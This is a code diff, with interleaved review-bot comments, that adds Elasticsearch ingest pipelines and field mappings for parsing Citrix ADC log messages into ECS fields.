set: + field: destination.port + tag: set_destination_port_from_translated_destination_port + 
copy_from: citrix_adc.log.translated_destination.port + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - date: + field: citrix_adc.log.delink_time + tag: date_delink_time + target_field: citrix_adc.log.delink_time + formats: + - yyyy/MM/dd:HH:mm:ss + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + - ISO8601 + if: ctx.citrix_adc?.log?.delink_time != null && ctx.citrix_adc.log.delink_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end_from_delink_time + copy_from: citrix_adc.log.delink_time + ignore_empty_value: true + - date: + field: citrix_adc.log.end_time + tag: date_end_time + target_field: citrix_adc.log.end_time + formats: + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + if: ctx.citrix_adc?.log?.end_time != null && ctx.citrix_adc.log.end_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end_from_end_time + copy_from: citrix_adc.log.end_time + ignore_empty_value: true + - set: + field: event.reason + tag: set_event_reason_from_closure_reason + copy_from: citrix_adc.log.closure_reason + ignore_empty_value: true + - date: + field: citrix_adc.log.start_time + tag: date_start_time + target_field: citrix_adc.log.start_time + formats: + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + if: ctx.citrix_adc?.log?.start_time != null && ctx.citrix_adc.log.start_time != '' + on_failure: + - append: + field: error.message + 
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.start + tag: set_event_start_from_start_time + copy_from: citrix_adc.log.start_time + ignore_empty_value: true + - set: + field: network.protocol + tag: set_network_protocol_from_protocol + copy_from: citrix_adc.log.protocol + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.ip + tag: convert_vserver_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.vserver?.ip != null && ctx.citrix_adc.log.vserver.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_vserver_ip + copy_from: citrix_adc.log.vserver.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.port + tag: convert_vserver_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_vserver_port + copy_from: citrix_adc.log.vserver.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.total_bytes_send + tag: convert_total_bytes_send_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: 
source.bytes + tag: set_source_bytes_from_total_bytes_send + copy_from: citrix_adc.log.total_bytes_send + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nat.ip + tag: convert_nat_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nat?.ip != null && ctx.citrix_adc.log.nat.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.nat.ip + tag: set_source_nat_ip_from_nat_ip + copy_from: citrix_adc.log.nat.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nat.port + tag: convert_nat_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.nat.port + tag: set_source_nat_port_from_nat_port + copy_from: citrix_adc.log.nat.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor 
{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.type + tag: convert_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.code + tag: convert_code_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.code + tag: set_event_code_from_code + copy_from: citrix_adc.log.code + ignore_empty_value: true + - convert: + field: citrix_adc.log.hit.count + tag: convert_hit_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/transform_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/transform_feature.yml new file mode 100644 index 00000000000..141c6714c90 --- /dev/null 
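Review bot: The `date_delink_time`, `date_start_time` and `date_end_time` processors set no `timezone`, so the `citrix_adc.log.delink_timezone`, `start_time_timezone` and `end_time_timezone` values captured by the grok patterns are never applied and those timestamps are parsed as UTC even when the device reports a local zone. If the reported zone should be honoured, add a zone-aware variant of each date processor guarded on the timezone field being present, and leave the existing processor as the UTC fallback with a guard for the field being absent; if UTC is intended, a comment such as `# delink/start/end zones are captured for reference only; timestamps are parsed as UTC` would stop the captured zones from looking like dead fields. Separately, the `formats` lists of `date_timestamp` and `date_delink_time` appear to repeat an entry (`MMM d HH:mm:ss`, `yyyy/MM/dd:HH:mm:ss`), which may be a whitespace difference lost in this rendering; worth confirming the duplicates are intentional.
```yaml
  - date:
      field: citrix_adc.log.delink_time
      tag: date_delink_time_with_zone
      target_field: citrix_adc.log.delink_time
      timezone: '{{{citrix_adc.log.delink_timezone}}}'
      formats:
        - yyyy/MM/dd:HH:mm:ss
        - MM/dd/yyyy:HH:mm:ss
        - ISO8601
      if: ctx.citrix_adc?.log?.delink_time != null && ctx.citrix_adc.log.delink_time != '' && ctx.citrix_adc?.log?.delink_timezone != null && ctx.citrix_adc.log.delink_timezone != ''
      # … unchanged: on_failure append to error.message …
  # … unchanged: existing date_delink_time, with `&& (ctx.citrix_adc?.log?.delink_timezone == null || ctx.citrix_adc.log.delink_timezone == '')` added to its `if` as the UTC fallback …
```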
+++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/transform_feature.yml 
@@ -0,0 +1,49 @@ +--- +description: Pipeline for Citrix Native messages of TRANSFORM feature. +processors: + - grok: + description: Extract fields from message of TRANSFORM feature. + tag: grok_transform_feature + field: citrix.extended.message + patterns: + - '^Client %{IP:citrix_adc.log.client_ip} - Profile %{DATA:citrix_adc.log.profile} - Action %{DATA:citrix_adc.log.action} - Value %{GREEDYDATA:citrix_adc.log.value}$' + - '^Client %{IP:citrix_adc.log.client_ip} - Profile %{DATA:citrix_adc.log.profile} - Action %{DATA:citrix_adc.log.action} - PCRE%{SPACE}error%{SPACE}code %{INT:citrix_adc.log.pcre_error_code}$' + - '^Client %{IP:citrix_adc.log.client_ip} - Profile %{DATA:citrix_adc.log.profile} - Failed%{SPACE}to%{SPACE}write%{SPACE}%{DATA:citrix_adc.log.header}%{SPACE}request%{SPACE}header$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - convert: + field: citrix_adc.log.pcre_error_code + tag: convert_pcre_error_code_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + 
field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/fields/agent.yml b/packages/citrix_adc/data_stream/log/fields/agent.yml similarity index 66% rename from packages/trendmicro/data_stream/deep_security/fields/agent.yml rename to packages/citrix_adc/data_stream/log/fields/agent.yml index df8246bfab2..d38a70bd6b3 100644 --- a/packages/trendmicro/data_stream/deep_security/fields/agent.yml +++ b/packages/citrix_adc/data_stream/log/fields/agent.yml @@ -2,14 +2,16 @@ title: Cloud group: 2 description: Fields related to the cloud or infrastructure the events are coming from. - footnote: "Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on." + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' type: group fields: - name: account.id level: extended type: keyword ignore_above: 1024 - description: "The cloud account or organization id used to identify different entities in a multi-tenant environment.\nExamples: AWS account id, Google Cloud ORG Id, or other unique identifier." + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' example: 666777888999 - name: availability_zone level: extended 
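Review bot: The `if` of `convert_client_ip_to_ip` mixes null-safe and plain access, `ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != ''`; the second `?.` is redundant once the first clause has passed, and the other pipelines added in this commit write the same guard without it. Suggest `if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc.log.client_ip != ''` for consistency.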
@@ -55,7 +57,9 @@ - name: container title: Container group: 2 - description: "Container fields are used for meta information about the specific container that is the source of information.\nThese fields help correlate data based containers from any runtime." + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' type: group fields: - name: id @@ -81,7 +85,9 @@ - name: host title: Host group: 2 - description: "A host is defined as a general computing instance.\nECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes." + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' type: group fields: - name: architecture 
@@ -94,19 +100,27 @@ level: extended type: keyword ignore_above: 1024 - description: "Name of the domain of which the host is a member.\nFor example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider." + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' example: CONTOSO default_field: false - name: hostname level: core type: keyword ignore_above: 1024 - description: "Hostname of the host.\nIt normally contains what the `hostname` command returns on the host machine." + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' - name: id level: core type: keyword ignore_above: 1024 - description: "Unique host id.\nAs hostname is not always unique, use values that are meaningful in your environment.\nExample: The current usage of `beat.name`." + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' - name: ip level: core type: ip @@ -120,7 +134,9 @@ level: core type: keyword ignore_above: 1024 - description: "Name of the host.\nIt can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use." + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' - name: os.family level: extended type: keyword 
@@ -160,7 +176,9 @@ level: core type: keyword ignore_above: 1024 - description: "Type of host.\nFor Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment." + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' - name: containerized type: boolean description: > @@ -178,33 +196,12 @@ description: > OS codename, if any. -- name: log.source.address - type: keyword - description: Source address from which the log event was read / sent from. - name: input.type type: keyword - description: Input type + description: Input type. - name: log.offset type: long - description: Log offset -- name: log.file - type: group - fields: - - name: device_id - type: keyword - description: ID of the device containing the filesystem where the file resides. - - name: fingerprint - type: keyword - description: The sha256 fingerprint identity of the file when fingerprinting is enabled. - - name: inode - type: keyword - description: Inode number of the log file. - - name: idxhi - type: keyword - description: The high-order part of a unique identifier that is associated with a file. (Windows-only) - - name: idxlo - type: keyword - description: The low-order part of a unique identifier that is associated with a file. (Windows-only) - - name: vol - type: keyword - description: The serial number of the volume that contains a file. (Windows-only) + description: Offset of the entry in the log file. +- name: log.source.address + type: keyword + description: Source address from which the log event was read / sent from. diff --git a/packages/citrix_adc/data_stream/log/fields/base-fields.yml b/packages/citrix_adc/data_stream/log/fields/base-fields.yml new file mode 100644 index 00000000000..b2f34a08dc6 --- /dev/null 
+++ b/packages/citrix_adc/data_stream/log/fields/base-fields.yml @@ -0,0 +1,17 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module + value: citrix_adc +- name: event.dataset + type: constant_keyword + description: Event dataset + value: citrix_adc.log diff --git a/packages/trendmicro/data_stream/deep_security/fields/ecs.yml b/packages/citrix_adc/data_stream/log/fields/ecs.yml similarity index 53% rename from packages/trendmicro/data_stream/deep_security/fields/ecs.yml rename to packages/citrix_adc/data_stream/log/fields/ecs.yml index 15c10d63875..4ff1fa2e571 100644 --- a/packages/trendmicro/data_stream/deep_security/fields/ecs.yml +++ b/packages/citrix_adc/data_stream/log/fields/ecs.yml 
@@ -1,83 +1,90 @@ - external: ecs - name: destination.as.number + name: "@timestamp" - external: ecs - name: destination.as.organization.name + name: client.as.number - external: ecs - name: destination.bytes + name: client.as.organization.name - external: ecs - name: destination.domain + name: client.geo.city_name - external: ecs - name: destination.geo.city_name + name: client.geo.continent_name - external: ecs - name: destination.geo.continent_name + name: client.geo.country_iso_code - external: ecs - name: destination.geo.country_iso_code + name: client.geo.country_name - external: ecs - name: destination.geo.country_name -- description: Longitude and latitude. - level: core - name: destination.geo.location - type: geo_point + name: client.geo.location - external: ecs - name: destination.geo.region_iso_code + name: client.geo.region_iso_code - external: ecs - name: destination.geo.region_name + name: client.geo.region_name - external: ecs - name: destination.ip + name: client.user.name - external: ecs - name: destination.nat.ip -- external: ecs - name: destination.nat.port + name: ecs.version - external: ecs - name: destination.port + name: error.message - external: ecs - name: destination.user.group.id + name: event.category - external: ecs - name: destination.user.group.name + name: event.code - external: ecs - name: destination.user.id + name: event.created - external: ecs - name: destination.user.name + name: event.duration - external: ecs - name: ecs.version + name: event.end - external: ecs name: event.ingested - external: ecs - name: event.original + name: event.kind - external: ecs - name: file.group + name: event.provider - external: ecs - name: file.hash.md5 + name: event.severity - external: ecs - name: file.hash.sha1 + name: event.start - external: ecs - name: file.hash.sha256 + name: event.timezone - external: ecs - name: file.inode -- external: ecs - name: file.type + name: event.type - external: ecs name: file.path - external: ecs - name: 
file.size + name: labels - external: ecs - name: http.request.method + name: http.request.id - external: ecs - name: http.request.referrer + name: http.request.method - external: ecs name: log.file.path - external: ecs - name: log.syslog.priority + name: log.level - external: ecs name: message - external: ecs - name: network.application + name: network.bytes - external: ecs name: network.community_id - external: ecs name: network.direction +- external: ecs + name: network.iana_number +- external: ecs + name: network.inner + type: group +- external: ecs + name: network.inner.vlan.id +- external: ecs + name: network.inner.vlan.name +- external: ecs + name: network.protocol - external: ecs name: network.transport +- external: ecs + name: network.type +- external: ecs + name: observer.egress.interface.name - external: ecs name: observer.egress.zone - external: ecs @@ -88,6 +95,8 @@ name: observer.ingress.zone - external: ecs name: observer.ip +- external: ecs + name: observer.name - external: ecs name: observer.product - external: ecs @@ -97,7 +106,9 @@ - external: ecs name: observer.version - external: ecs - name: related.hash + name: process.name +- external: ecs + name: process.pid - external: ecs name: related.hosts - external: ecs @@ -105,11 +116,7 @@ - external: ecs name: related.user - external: ecs - name: rule.category -- external: ecs - name: rule.id -- external: ecs - name: rule.uuid + name: source.address - external: ecs name: source.as.number - external: ecs @@ -126,10 +133,8 @@ name: source.geo.country_iso_code - external: ecs name: source.geo.country_name -- description: Longitude and latitude. - level: core +- external: ecs name: source.geo.location - type: geo_point - external: ecs name: source.geo.region_iso_code - external: ecs 
@@ -143,34 +148,60 @@ - external: ecs name: source.port - external: ecs - name: source.user.group.id + name: source.user.domain +- external: ecs + name: source.user.name - external: ecs name: source.user.group.name - external: ecs - name: source.user.id + name: tags - external: ecs - name: source.user.name + name: url.domain - external: ecs - name: tags + name: url.extension +- external: ecs + name: url.fragment +- external: ecs + name: url.full - external: ecs name: url.original - external: ecs - name: user_agent.original -- name: event.action - external: ecs -- name: event.category - external: ecs -- name: event.type - external: ecs -- name: event.code - external: ecs -- name: event.duration - external: ecs -- name: event.id - external: ecs -- name: event.kind - external: ecs -- name: event.risk_score - external: ecs -- name: event.severity - external: ecs + name: url.password +- external: ecs + name: url.path +- external: ecs + name: url.port +- external: ecs + name: url.query +- external: ecs + name: url.registered_domain +- external: ecs + name: url.scheme +- external: ecs + name: url.subdomain +- external: ecs + name: url.top_level_domain +- external: ecs + name: url.username +- external: ecs + name: user.email +- external: ecs + name: user.name +- external: ecs + name: server.domain +- external: ecs + name: server.address +- external: ecs + name: server.port +- external: ecs + name: server.ip +- external: ecs + name: server.user.name +- external: ecs + name: client.domain +- external: ecs + name: client.address +- external: ecs + name: client.port +- external: ecs + name: client.ip diff --git a/packages/citrix_adc/data_stream/log/fields/fields.yml b/packages/citrix_adc/data_stream/log/fields/fields.yml new file mode 100644 index 00000000000..24118d6901e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/fields/fields.yml 
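Review bot: `url.password` is added to the mapped ECS fields in this hunk, which means any credentials embedded in request URLs that the ADC logs would be indexed in cleartext next to `url.username`; the ingest pipeline is outside this chunk, so confirm whether it ever populates the field (for example from a `uri_parts` processor over the request URL) and, if it does, drop or mask it with a `remove`/`set` step instead of mapping it. Separately, `event.action`, `event.id` and `event.original` are removed from this list during the rename, yet sample_event.json in the same commit emits all three (and the manifest's `preserve_original_event` option writes `event.original`), so unless they are mapped elsewhere, e.g. through `ecs@mappings`, they will be dynamically mapped. Re-adding `- external: ecs` / `  name: event.action` and the two others here keeps the declared schema in step with what the pipeline produces.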
@@ -0,0 +1,606 @@ +- name: citrix + type: group + fields: + - name: cef_format + description: Whether the logging is in Citrix CEF format. + type: boolean + - name: cef_version + description: The CEF format version used in the logs. + type: keyword + - name: device_event_class_id + description: The ID of the event class. + type: keyword + - name: default_class + description: Whether the event class was the default. + type: boolean + - name: detail + description: The CEF or Citrix Native format details for the event. + type: keyword + - name: device_product + description: The model of the appliance. + type: keyword + - name: device_vendor + description: The name of the vendor for the device. + type: keyword + - name: device_version + description: The version of the device. + type: keyword + - name: facility + description: The logging facility. + type: keyword + - name: host + description: The name of the host receiving the logs. + type: keyword + - name: hostname + description: The name of the host receiving the logs. + type: keyword + - name: name + description: The name of the security check. + type: keyword + - name: ppe_id + description: Packet Processing Engine ID. + type: keyword + - name: priority + description: The logging priority. + type: keyword + - name: profile_name + description: The name of the profile that raised the event. + type: keyword + - name: session_id + description: The ID for the session. + type: keyword + - name: severity + description: The severity of the event. + type: keyword + - name: signature_violation_category + description: The category that the violation is grouped into. + type: keyword + - name: extended + description: Additional data associated with the event. 
+ type: flattened +- name: citrix_adc + type: group + fields: + - name: log + type: group + fields: + - name: access + type: keyword + - name: access_type + type: keyword + - name: action + type: keyword + - name: adm_user + type: keyword + - name: app + type: group + fields: + - name: launch_time + type: keyword + - name: name + type: keyword + - name: process_id + type: long + - name: termination_time + type: keyword + - name: termination_type + type: keyword + - name: appfw_rfc_profile + type: keyword + - name: application_name + type: keyword + - name: auto_deploy_mins + type: long + - name: browser + type: keyword + - name: browser_type + type: keyword + - name: bytes + type: group + fields: + - name: received + type: long + - name: sent + type: long + - name: call_id + type: keyword + - name: callee + type: group + fields: + - name: domain_name + type: keyword + - name: user_name + type: keyword + - name: caller + type: group + fields: + - name: domain_name + type: keyword + - name: user_name + type: keyword + - name: category + type: keyword + - name: category_group + type: keyword + - name: certificate_key_pair + type: keyword + - name: channel_id_1 + type: long + - name: channel_id_1_val + type: long + - name: channel_id_2 + type: long + - name: channel_id_2_val + type: long + - name: channel_id_3 + type: long + - name: channel_id_3_val + type: long + - name: channel_id_4 + type: long + - name: channel_id_4_val + type: long + - name: channel_id_5 + type: long + - name: channel_id_5_val + type: long + - name: channel_update + type: group + fields: + - name: begin + type: keyword + - name: end + type: keyword + - name: cipher_suite + type: keyword + - name: client_cookie + type: keyword + - name: client_hostname + type: keyword + - name: client_ip + type: ip + - name: client_launcher + type: keyword + - name: client_port + type: long + - name: client_security_check_status + type: keyword + - name: client_security_expression + type: keyword + - name: 
client_type + type: keyword + - name: client_version + type: keyword + - name: clientside + type: group + fields: + - name: jitter + type: long + - name: packet_retransmits + type: long + - name: rtt + type: keyword + - name: rxbytes + type: long + - name: txbytes + type: long + - name: closure_reason + type: keyword + - name: code + type: keyword + - name: command + type: keyword + - name: compression_ratio_recieved + type: double + - name: compression_ratio_send + type: double + - name: connection_id + type: keyword + - name: connection_priority + type: keyword + - name: content_length_bytes + type: long + - name: content_type + type: keyword + - name: content_type_mismatch + type: keyword + - name: cookie_header_length + type: long + - name: crl_name + type: keyword + - name: customer_name + type: keyword + - name: data + type: keyword + - name: data_length + type: long + - name: days_to_expire + type: long + - name: deleted_rules + type: long + - name: delink_time + type: date + - name: delink_timezone + type: keyword + - name: destination + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: device_serial_number + type: keyword + - name: domain + type: keyword + - name: domain_name + type: keyword + - name: duration + type: keyword + - name: end_time + type: date + - name: end_time_timezone + type: keyword + - name: errmsg + type: keyword + - name: error + type: keyword + - name: error_code + type: keyword + - name: error_line + type: keyword + - name: failure_reason + type: keyword + - name: field_name + type: keyword + - name: field_type + type: keyword + - name: flags + type: keyword + - name: group + type: keyword + - name: groups + type: keyword + - name: handshake_time + type: keyword + - name: header + type: keyword + - name: header_length + type: long + - name: hit + type: group + fields: + - name: count + type: long + - name: rule + type: keyword + - name: hostname + type: keyword + - name: html_url + type: keyword + - 
name: http_resources_accessed + type: keyword + - name: ica_rtt + type: keyword + - name: icap_server + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: id + type: keyword + - name: infomsg + type: keyword + - name: ip_address + type: ip + - name: issuer_name + type: keyword + - name: l7_latency + type: group + fields: + - name: max_notify_count + type: long + - name: notify_interval + type: long + - name: threshold_factor + type: long + - name: waittime + type: keyword + - name: l7_threshold_breach + type: group + fields: + - name: avg_clientside_latency + type: long + - name: avg_serverside_latency + type: long + - name: max_clientside_latency + type: long + - name: max_serverside_latency + type: long + - name: last_contact + type: keyword + - name: launch_mechanism + type: keyword + - name: ldap_scope + type: keyword + - name: license_limit + type: long + - name: logout_method + type: keyword + - name: matched_url + type: keyword + - name: max_allowed + type: group + fields: + - name: cookie_header_length + type: long + - name: header_length + type: long + - name: query_string_length + type: long + - name: total_http_header_length + type: long + - name: url_length + type: long + - name: max_restarts + type: long + - name: message + type: keyword + - name: method + type: keyword + - name: min_l7_latency + type: long + - name: mode + type: keyword + - name: module_path + type: keyword + - name: nat + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: natted + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: newly_added_rules + type: long + - name: non_http_services_accessed + type: keyword + - name: nsica_session + type: group + fields: + - name: acr_count + type: long + - name: client + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: reconnect_count + type: long + - name: server + type: group + fields: + - name: ip + type: ip 
+ - name: port + type: long + - name: status + type: keyword + - name: nsica_status + type: keyword + - name: old_pid + type: long + - name: origin_server + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: original_destination + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: pcre_error_code + type: keyword + - name: peid + type: keyword + - name: policy_action + type: keyword + - name: policy_violation + type: keyword + - name: process + type: group + fields: + - name: id + type: long + - name: name + type: keyword + - name: profile + type: keyword + - name: protocol + type: keyword + - name: protocol_version + type: keyword + - name: query_string_length + type: long + - name: reason + type: keyword + - name: referer_header + type: keyword + - name: register + type: keyword + - name: remote_ip + type: ip + - name: reputation + type: long + - name: request + type: group + fields: + - name: bytes_sent + type: long + - name: path + type: keyword + - name: response + type: group + fields: + - name: bytes_sent + type: long + - name: code + type: long + - name: rewritten_url + type: keyword + - name: rule + type: keyword + - name: rule_id + type: keyword + - name: sequence_number + type: long + - name: serial_number + type: keyword + - name: server + type: group + fields: + - name: ip + type: ip + - name: name + type: keyword + - name: port + type: long + - name: server_authentication + type: keyword + - name: serverside + type: group + fields: + - name: jitter + type: long + - name: packet_retransmits + type: long + - name: rtt + type: keyword + - name: service + type: keyword + - name: session + type: keyword + - name: session_end_time + type: keyword + - name: session_guid + type: keyword + - name: session_id + type: keyword + - name: session_setup_time + type: keyword + - name: signature_algorithm + type: keyword + - name: signature_id + type: keyword + - name: source + type: group + fields: + - 
name: ip + type: ip + - name: port + type: long + - name: spcb_id + type: keyword + - name: ssl_relay + type: group + fields: + - name: address + type: ip + - name: port + type: long + - name: sslvpn_client_type + type: keyword + - name: sso_status + type: keyword + - name: start_time + type: date + - name: start_time_timezone + type: keyword + - name: startup_duration + type: long + - name: status + type: keyword + - name: subject_name + type: keyword + - name: timestamp + type: date + - name: timezone + type: keyword + - name: total_bytes_received + type: long + - name: total_bytes_send + type: long + - name: total_bytes_wire_recieved + type: keyword + - name: total_bytes_wire_send + type: keyword + - name: total_compressed_bytes_recieved + type: long + - name: total_compressed_bytes_send + type: long + - name: total_http_header_length + type: long + - name: total_policies_allowed + type: long + - name: total_policies_denied + type: long + - name: total_tcp_connections + type: long + - name: total_udp_flows + type: long + - name: translated_destination + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: transport + type: keyword + - name: type + type: keyword + - name: unknown_content_type + type: keyword + - name: url + type: keyword + - name: url_length + type: long + - name: user + type: keyword + - name: useremail + type: keyword + - name: username + type: keyword + - name: valid_from + type: date + - name: valid_to + type: date + - name: value + type: keyword + - name: violation_type + type: keyword + - name: vserver + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: watch_id + type: keyword diff --git a/packages/citrix_adc/data_stream/log/manifest.yml b/packages/citrix_adc/data_stream/log/manifest.yml new file mode 100644 index 00000000000..fa191448509 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/manifest.yml 
